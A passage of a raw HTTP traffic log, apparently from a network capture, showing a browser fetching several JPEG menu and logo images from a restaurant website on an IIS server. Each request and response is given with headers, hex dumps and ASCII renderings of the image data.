                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:10.496459961 CET1552INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1321
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "5efe63f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:15 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 48 03 01 11 00 02 11 01 03 11 01 ff c4 00 84 00 01 00 03 01 01 00 00 00 00 00 00 00 00 00 00 00 00 04 05 07 06 03 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 08 10 00 02 02 01 04 01 04 01 02 07 01 00 00 00 00 00 02 03 01 04 05 00 11 12 06 21 41 22 13 14 31 61 42 51 71 32 52 53 15 07 08 11 00 01 03 02 03 06 06 03 00 00 00 00 00 00 00 00 01 00 11 02 31 03 21 41 12 51 61 81 b1 13 04 f0 71 91 a1 c1 d1 23 14 34 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 df 79 eb e5 95 e0 27 3d 11 39 e8 89 cf 44 4e 7a 22 73 d1 13 9e 88 9c f4 44 e7 a2 2d 4f 27 95 c9 75 2e 9b d0 e7 ac dd 6e 2a 33 88 b5 7b 2d 91 ab 32 b6 59 b0 bb 12 a8 53 18 3e 48 54 31 11 c3 7e 3e 77 98 f3 ae 92 4c 23 1d 39 ae f9 ce 56 ad 43 41 67 72 4e dc 7e 14 14 62 b0 2d a3 d7 f3 9d a2 72 37 6f 77 7b f6 78 46 30 91 55 75 c1 6e 85 1b 24 25 0c 86 14 99 4c c0 04 04 6d eb e7 50 20 18 19 66 aa 2d c0 88 ca 6e 4c 89 a3 0f 8f 65 3a df 4d eb 3d 76 ae 4d b9 f7 64 b2 2e a3 d9 df 81 58 e3 9a 94 01 29 4b 5b 3e 52 96 a9 d3 05 10 53 b8 c4 4e f3 e3 78 db 79 93 6a 31 ab d5 95 a5 db c2 d8 3a 9c b4 9b 06 fa 2a c3 31 80 eb 7d 6f ab f7 2a 16 b1 cf c8 df c3 76 55 63 eb e5 81 c9 4b 66 09 16 09 53 ee ac c2 10 88 18 e6 10 5e e9 da 60 87 6d 4c a1 18 c4 86 a1 56 b9 6a 16 ed cc 10 e4 49 9f 0d 87 77 a8 51 2c 7f cf 29 c6 0b 28 f8 55 bc 6e 63 12 8a 0e 21 bb 7a 89 93 7e db 96 92 86 50 47 27 d6 88 f9 60 86 4c cb 78 fc ed be a3 a2 18 ed e1 c9 41 ed 46 82 71 04 35 48 cf 70 c4 22 70 fd 23 11 de f1 dd 65 95 72 d9 1b 98 ec e5 4a 16 cd ed af f5 2d cf c9 0b 64 ca 89 12 40 10 cd a7 8c c9 f3 0d e3 70 df 7d 34 40 4d b1 aa 0b 76 a1 74 43 12 41 03 26 3e df 6e b8 0e d9 38 c0 ec 39 65 62 69 b6 85 54 5a 7a e6 bb 5a 0e d8 c5 a5 13 21 f1 a5 30 21 f8 d8 76 9d bf ba 75 9c c0 d4 59 72 df d3 ac e9 0c 1f c6 41 6c 61 b8 7f e8 5b 7c a2 62 23 21 69 93 e3 f6 7d 33 3e 5f cb 8f 9d 6e df 99 77 8f ec 3e 67 92 ce 43 af 62 9d d4 83 2d 8e 55 8c ce 4d 75 d8 fc c7 c1 7a ba bf d7 c8 ba 42 3e 4a 24 83 73 03 86 c5 2c 13 81 f3 e7 6d bc e5 a0 69 71 8f 8d 8b 93 a5 13 6f 50 c4 e7 88 c3 83 3f 15 ce e3 3b 8e 7f 13 48 71 b5 2d a9 98 f0 77 d8 4d 3b 75 6b dc 5a 9d fe 45 0d 95 36 16 5f a8 ed 3a 81 32 03 2a 42 fc e0 18 53 78 07 9a 97 57 bf 76 aa 90 c8 0c 98 bf 9d a2 bc 05 6e b5 7b 44 ab 27 fd 4d 41 3d 4c 95 14 ff 00 15 f1 d4 8b 92 0a 47 73 70 67 9b e4 71 e3 4e 0a 99 b9 fc b5 8a 45 8f 7d d3 75 53 be 79 33 16 40 91 95 b6 0c 01 b4 99 31 27 33 31 11 be f3 b7 af e7 55 d4 59 95 0d c9 10 c7 6b f1 56 4c ee dd 8d e5 9c 2b 17 97 6a 3b 23 21 d9 85 be ad 66 83 5b 10 50 2c 10 35 10 ac e2
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedH!A"1aBQq2RS1!AQaq#4?y'=9DNz"sD-O'u.n*3{-2YS>HT1~>wL#9VCAgrN~b-r7ow{xF0Uun$%LmP f-nLe:M=vMd.X)K[>RSNxyj1:*1}o*vUcKfS^`mLVjIwQ,)(Unc!z~PG'`LxAFq5Hp"p#erJ-d@p}4@MvtCA&>n89ebiTZzZ!0!vuYrAla[|b#!i}3>_nw>gCb-UMuzB>J$s,miqoP?;Hq-wM;ukZE6_:2*BSxWvn{D'MA=LGspgqNE}uSy3@1'31UYkVL+j;#!f[P,5
                                                                                                                                                              Mar 13, 2023 05:26:10.525470972 CET1555OUTGET /images/menu_leftPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:10.729902029 CET1560INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 506
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "e2d57bf8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:16 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 3b 03 01 11 00 02 11 01 03 11 01 ff c4 00 79 00 01 00 03 01 00 00 00 00 00 00 00 00 00 00 00 00 00 04 05 08 07 01 01 00 02 03 01 00 00 00 00 00 00 00 00 00 00 00 00 02 04 01 05 07 08 10 00 02 01 01 06 03 09 00 00 00 00 00 00 00 00 00 00 12 01 22 11 02 03 13 04 05 21 31 14 41 51 32 42 15 06 16 17 08 11 01 00 01 02 04 06 03 00 00 00 00 00 00 00 00 00 00 11 01 02 41 51 12 04 31 81 91 22 42 03 14 15 06 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef ae 79 65 a0 1c 03 80 70 0e 01 c0 38 07 02 33 12 86 46 10 0c 20 18 40 30 80 61 00 c2 01 84 09 fb f6 d5 aa f6 fe f5 ba ec 9a dc 39 c2 d5 6d 7a ac 5d 36 2d db d1 67 1c 3b d3 11 31 df 13 1c 62 7b 60 b7 bc da df b5 f7 5f ea be 91 5b 6b 5a 74 4a eb 74 d6 b4 54 31 59 11 80 30 06 00 c0 18 03 01 b4 bf 48 7d 60 f1 d7 e7 fc fb 2a e6 57 a6 ab 65 59 47 5a d4 2d 9e 1f 3f 2b 29 3a b7 ee 7e b2 7b e7 e4 47 8e 58 6b c2 32 f2 e4 d8 6e b4 63 c5 8a 6a 39 52 81 50 0a 80 54 02 a0 15 00 a8 0f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed;y"!1AQ2BAQ1"B?yep83F @0a9mz]6-g;1b{`_[kZtJtT1Y0H}`*WeYGZ-?+):~{GXk2ncj9RPT
                                                                                                                                                              Mar 13, 2023 05:26:10.732055902 CET1560OUTGET /images/logo.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:10.937443972 CET1564INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 7862
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:24 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "9adbfff7a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:16 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 2b 01 68 03 01 11 00 02 11 01 03 11 01 ff c4 00 a9 00 00 01 05 01 01 01 00 00 00 00 00 00 00 00 00 00 00 03 04 05 06 07 02 01 08 01 01 00 02 03 01 01 01 00 00 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 10 00 02 01 03 03 02 03 06 05 02 05 01 09 00 00 00 01 02 03 04 05 06 00 11 12 21 07 31 91 13 41 51 71 22 32 14 61 b1 c1 15 08 81 52 d1 42 c2 23 16 62 72 92 d2 53 93 44 54 b4 55 11 00 01 03 02 04 04 04 04 05 03 03 05 01 00 00 00 01 00 11 02 03 04 21 31 12 05 41 51 13 06 61 71 91 22 81 a1 32 42 b1 d1 52 23 14 82 15 16 c1 e1 92 62 72 b2 c2 d2 24 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 fb 71 b3 5a fe bc 29 69 c7 bb 7e 67 fd 43 5f 99 8e f7 57 84 47 cf f3 5c 3e a9 48 9c ca ea 77 da 2a 75 fc 02 37 ea c7 54 3b cd 7e 51 f4 3f 9a 8e a9 49 1c ba f0 7c 1a 25 f8 20 fd 75 53 bb dc 73 1e 89 d4 29 23 95 de 8e fb 54 aa ef ee 8d 3a 79 83 aa 1d d6 e3 f5 7c 82 8e a1 49 1c 9e f6 de 35 a7 a7 b9 23 1f 92 ea a7 73 b9 3f 7f c8 7e 49 ac ae 0e 45 79 27 73 5c ff 00 d0 28 fc 86 aa 77 1b 8f d6 7e 49 ac ae 0d fe f0 7a 9a f9 7f a1 db f2 1a a9 bf b8 3f 79 51 ac ae 0d f2 ec de 37 09 ff 00 a3 91 f9 6a 0d ed 73 f7 9f 54 d4 57 06 f1 75 6f 1b 8d 4f 4f 74 ac 3f 23 aa 9b ca e7 ef 97 a9 4d 47 9a e4 dd 6e 4d f5 5c 2a 5b e3 33 9f d7 50 6e ab 1f be 5e a5 35 15 c1 b8 d7 37 46 ac 9c 8f 71 91 bf c7 55 35 ea 9f b8 fa 95 1a 8a e7 ef ab 3f f9 53 7f ea 37 f8 ea 3a d5 3f 51 f5 28 e5 72 6b 2a 9b ea a8 95 b6 f7 bb 1f d7 50 6a cc fd c7 d5 1c af 3e ea a3 ff 00 3e 4f fb e7 4e a4 b9 94 75 e1 a9 9c 8d 8c d2 11 ee 2c 75 06 72 3c 4a 3a e7 d6 93 fb db cc ea 35 1e 68 8f 5a 4f ef 6f 33 a6 a3 cd 11 eb 49 fd ed e6 74 d4 79 a2 3d 69 3f bd bc ce 9a 8f 34 47 ad 27 f7 b7 99 d3 51 e6 8b a1 51 32 fd 32 ba fc 18 8d 48 9c 87 12 8e bd 15 75 20 ee 27 90 11 ed 0e 7f c7 53 d4 9f 33 ea 8e 94 15 f5 aa 77 15 73 83 ef 12 37 f8 ea c2 bd 41 f7 1f 52 8e 57 62 e9 71 5e ab 5f 52 a7 f0 95 c7 eb a9 17 35 87 df 2f 52 a7 51 4a 0b cd d4 0d 85 c6 a7 fa ca c7 f3 3a b8 bc ae 3e f9 7a 94 d4 79 a5 45 fe f0 3a 8a f9 7f a9 df f3 1a b0 bf b8 1f 79 4d 65 2a b9 25 e9 76 da b9 ba 7b d5 0f e6 ba b8 dc ae 07 df f8 7e 4a 75 94 aa e5 57 b1 e3 54 1b e3 1c 7f a2 8d 5c 6e b7 3f ab e4 3f 24 ea 14 b0 cb af 03 c5 a2 6f 8a 0f d3 6d 5c 6e f7 1c c7 a2 9e a1 4b 0c ce ea 3c 61 a6 6f 8a b7 e8 e3 57 1b d5 7e 51 f4 3f 9a 75 4a 59 73 6a ef f3 51 c0 7e 05 87 ea 75 71 bd d4 e3 11 f3 53 d5 29 75 cd e5 1f 5d b9 5b e1 21 1f e9 3a c8 37 c9 71 87 cf fd 94 f5 7c 12 cb 9c 46 76 e7 6e 65 f7 ed 28 3f e9 1a b8 df 07 18 7c ff 00 d9 3a be 09 75 cd a8 8f d7 47 3a fc 0a 9f d4 6a e3 7b a7 c6 27 e4 a7
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed+h!1AQq"2aRB#brSDTU!1AQaq"2BR#br$?qZ)i~gC_WG\>Hw*u7T;~Q?I|% uSs)#T:y|I5#s?~IEy's\(w~Iz?yQ7jsTWuoOOt?#MGnM\*[3Pn^57FqU5?S7:?Q(rk*Pj>>ONu,ur<J:5hZOo3Ity=i?4G'QQ22Hu 'S3ws7ARWbq^_R5/RQJ:>zyE:yMe*%v{~JuWT\n??$om\nK<aoW~Q?uJYsjQ~uqS)u][!:7q|Fvne(?|:uG:j{'
                                                                                                                                                              Mar 13, 2023 05:26:11.223949909 CET1578OUTGET /images/menu_rightPic.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:11.428338051 CET1590INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 529
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "a4c187f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:16 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 2d 03 01 11 00 02 11 01 03 11 01 ff c4 00 81 00 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 05 04 07 09 01 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 01 02 04 05 07 08 10 00 01 02 03 06 04 07 00 00 00 00 00 00 00 00 00 00 01 12 11 03 04 21 02 22 14 05 15 71 62 13 17 41 51 a1 93 44 16 27 11 01 00 01 02 02 05 0d 00 00 00 00 00 00 00 00 00 00 11 02 12 01 13 21 81 a1 03 04 f0 31 41 22 42 62 82 b2 c2 23 14 15 25 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef af 3e 59 70 07 80 78 07 80 78 07 81 99 c5 a1 23 84 03 84 03 84 03 84 03 84 0c ee 2c 0e 00 e0 0e 00 e0 2b cb d2 6a e6 68 55 7a fb 15 28 69 2b e9 b4 f5 9a a9 65 e9 b5 12 a7 cd 4b a8 be 2a 97 64 db c5 3c cd 34 f0 b5 e3 b8 ab 7d 1d 5c 2a c2 9d 75 61 56 3e 95 ad d1 28 98 8c e8 31 00 c4 03 10 15 34 5d 9b 73 a4 fb 0e 73 67 7a 67 76 fe 9e 61 91 b5 9d 5c 31 e2 68 e1 72 33 30 cf ba ce 9b 62 ed 53 a1 34 c4 e9 e6 7a 13 f8 9f 69 fe 1f 6f a3 cf d7 cd c3 de cc 7a c3 90 f6 9f c5 fa ae cf c6 d7 37 79 af db e1 74 fd ac be ef 2d af ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobed-!"qbAQD'!1A"Bb#%?>Ypxx#,+jhUz(i+eK*d<4}\*uaV>(14]ssgzgva\1hr30bS4zioz7yt-
                                                                                                                                                              Mar 13, 2023 05:26:11.432950974 CET1590OUTGET /images/menu_bg.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:11.637669086 CET1618INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 340
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "7a4c72f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:16 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 1c 03 01 11 00 02 11 01 03 11 01 ff c4 00 54 00 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 04 03 07 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 01 02 05 08 10 01 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 12 22 11 01 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 11 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 ef b6 f2 cb 80 58 16 05 82 6a 6a 29 44 0a 20 51 04 f4 d0 50 14 05 03 3d 2a 9a 03 40 68 1f ff d9
                                                                                                                                                              Data Ascii: JFIFddDuckyPAdobedT"?Xjj)D QP=*@h
                                                                                                                                                              Mar 13, 2023 05:26:11.640022993 CET1619OUTGET /images/menu03.jpg HTTP/1.1
                                                                                                                                                              Host: www.gourmethousemacau.com
                                                                                                                                                              Connection: keep-alive
                                                                                                                                                              User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36
                                                                                                                                                              Accept: */*
                                                                                                                                                              Accept-Encoding: gzip, deflate
                                                                                                                                                              Accept-Language: en-US,en;q=0.9
                                                                                                                                                              Cookie: ASPSESSIONIDQSDATRQQ=LIECCMEDDGDGBJHLPJFJCOOJ
                                                                                                                                                              Mar 13, 2023 05:26:11.845746994 CET1657INHTTP/1.1 200 OK
                                                                                                                                                              Content-Length: 1828
                                                                                                                                                              Content-Type: image/jpeg
                                                                                                                                                              Last-Modified: Tue, 23 Aug 2022 04:15:25 GMT
                                                                                                                                                              Accept-Ranges: bytes
                                                                                                                                                              ETag: "564f34f8a6b6d81:615ba"
                                                                                                                                                              Server: Microsoft-IIS/6.0
                                                                                                                                                              X-Powered-By: ASP.NET
                                                                                                                                                              Date: Mon, 13 Mar 2023 04:26:17 GMT
                                                                                                                                                              Data Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 02 00 00 64 00 64 00 00 ff ec 00 11 44 75 63 6b 79 00 01 00 04 00 00 00 50 00 00 ff ee 00 0e 41 64 6f 62 65 00 64 c0 00 00 00 01 ff db 00 84 00 02 02 02 02 02 02 02 02 02 02 03 02 02 02 03 04 03 02 02 03 04 05 04 04 04 04 04 05 06 05 05 05 05 05 05 06 06 07 07 08 07 07 06 09 09 0a 0a 09 09 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 01 03 03 03 05 04 05 09 06 06 09 0d 0b 09 0b 0d 0f 0e 0e 0e 0e 0f 0f 0c 0c 0c 0c 0c 0f 0f 0c 0c 0c 0c 0c 0c 0f 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c 0c ff c0 00 11 08 00 1c 00 64 03 01 11 00 02 11 01 03 11 01 ff c4 00 89 00 01 00 03 01 01 01 00 00 00 00 00 00 00 00 00 00 00 04 05 06 03 07 01 01 01 01 01 01 01 01 01 00 00 00 00 00 00 00 00 00 00 02 03 01 04 05 08 10 00 01 03 04 01 03 03 02 04 07 00 00 00 00 00 00 03 01 02 04 00 11 05 06 12 21 22 13 31 41 14 15 16 61 42 07 17 71 32 62 23 33 24 34 11 00 01 03 03 02 05 03 03 05 00 00 00 00 00 00 00 01 00 11 02 21 31 03 41 12 51 61 81 13 04 91 c1 32 f0 b1 d1 71 f1 22 62 14 ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 f7 de 75 f9 65 7c 04 e7 44 4e 74 44 e7 44 4e 74 45 22 4c 79 70 de 31 cc 8c 68 af 28 d8 61 30 cc 73 15 c3 23 79 31 e8 8e 44 bb 5c 8b 74 5f 45 4a 10 ca 8c 48 ba 8f ce 8a 53 9d 11 39 d1 14 89 31 e5 c3 78 c7 32 31 a2 bc a3 61 84 c3 31 cc 57 0c 8d e4 c7 a2 39 12 ed 72 2d d1 7d 15 28 43 2a 31 22 ea 3f 3a 29 4e 74 44 e7 44 5e 8b a9 9d f8 9d 2b 73 d8 f1 8f 41 67 a2 c8 c7 c2 8f 3d a9 fd e8 80 92 a4 52 10 4e fc 8e 7a b5 19 c9 3a a7 b5 af 5e 88 52 24 8b af 6e 03 b3 14 e6 3e 54 1f a3 ad 56 16 17 ee 0e 0f 50 fb a6 49 e4 4e 93 b4 3f 0e 3c cf 24 f9 a5 84 e8 be 57 b5 c5 23 5e a4 f1 bd 12 ca e4 5b 5e d5 71 8f 70 0d dc 59 6d 8e 3d f8 47 7d f7 33 ea cc b1 b8 2d 4b 1b 93 c5 62 a7 1c f2 58 69 db 7c 5d 7c ad 1b 98 8d 48 c7 1f 27 3d a8 ac 55 f2 22 fa 2d ed fd 35 9c 71 82 3a b2 c3 1e 08 ca 20 9d 64 23 d1 67 36 50 60 e1 66 65 63 b0 ad 9a c8 d8 f3 92 31 e5 4e 28 c8 f2 b8 6f 56 a9 1a c1 08 7c 13 a7 f2 aa bb f8 d4 ce 20 16 0b 1c d1 88 93 45 e9 c5 6f 7f 51 36 0c ce b9 b2 e5 75 5c 3c c2 63 b5 bc 70 05 0e 26 19 88 8b 14 a0 78 18 aa 52 09 c8 ac 2b 88 ae 57 f3 72 2a dd 6e 8b d1 2b 5c b2 31 96 d1 65 ea f2 b2 4b 1c cc 22 5a 22 8d a5 95 d6 c3 86 c0 e7 e5 c6 86 f7 4f 0e 72 26 8f 0f 24 09 6d 20 be 25 e1 e3 d8 54 0b 83 e3 57 bb 9b 1a bd fe 44 b2 fe 55 f5 aa 9c 04 8f 36 f6 5a 65 c7 0c 85 aa fb 01 e5 40 a8 f1 fa 4e ba 6c a6 b7 aa cb 36 45 73 fb 2e 30 53 85 95 09 04 90 e3 92 50 54 e0 1b a3 a8 5c f2 35 12 c8 f7 21 5b ef 64 e9 50 31 45 c4 6a e5 65 1f 1a 06 51 81 7d d2 0e fa 56 d4 6f 75 45 94 c1 eb 38 2c 7e 26 3e 41 f9 29 19 cc d6 21 99 48 f3 23 3c 2d 86 27 c8 bf 80 2e 13 c7 cd e9 db de f4 22 5b d9 ab 6a 99 42 31 01 dd c8 59 cf 14 20 00 2e e4 3e 8d cb f7 75 7b 33 4a d7 07 90 da 35 88 e6 c8 b7 3f ab 63 0f 38 d9 62 90 5f 08 e5 88 c4 21 c6 91 d0 28 f1 b5 51 55 18 e5 2b ba da e9 d6 a8 e2 8b 91 57 0b 49 78 d0 79 40 3e e8 87 7d 29 7a 37 ba b5 d9 f0 b8 b9 03 7e c7 99 59 46 81 83 d7 75 b0 37 1f 08 8c 09 8c 69 91 11 18 aa 62 0c cd 63 1a 83 55 5e c5 55 e8 89 55 38 03 53 a0 0a f3 63 89 fe 72 76 11 8d b9 8e aa 20 7f 4e b1 72 4a 79 f0 05
